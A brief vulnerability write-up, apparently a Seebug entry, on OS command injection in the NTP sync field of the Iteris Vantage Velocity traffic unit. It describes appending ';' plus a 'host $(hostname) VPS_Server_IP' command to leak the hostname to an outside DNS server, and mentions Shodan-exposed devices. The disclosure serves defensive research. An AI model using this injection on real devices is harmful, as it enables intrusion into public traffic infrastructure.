Vantage Velocity Field Unit - Os...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

![](https://images.seebug.org/1583377282176-w331s) ​ ![](https://images.seebug.org/1583377303442-w331s) ![](https://images.seebug.org/1583377318719-w331s) More information about the device: <https://www.iteris.com/products/travel-time/vantage-velocity> Affected Versions: - 2.3.1 - 2.4.2 - 3.0 Shodan: ![](https://images.seebug.org/1583377329717-w331s) Surfing the internet I found this device that I did not know, and that turned out to be quite interesting. In the first instance what I see is a menu called "Time Settings", inside it, there is a function called "Synchronize With NTP Server", so I imagine that behind it ran something similar to an "ntpdate -u ntp.server. com "for example. so I decided to try the classic ";" and concatenate a new command, in this case a "host $ (hostname) VPS_Server_IP" and on my DNS server I get to the hostname of the device, which confirms that it was possible to execute commands. ![](https://images.seebug.org/1583377341022-w331s) Getting hostname...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息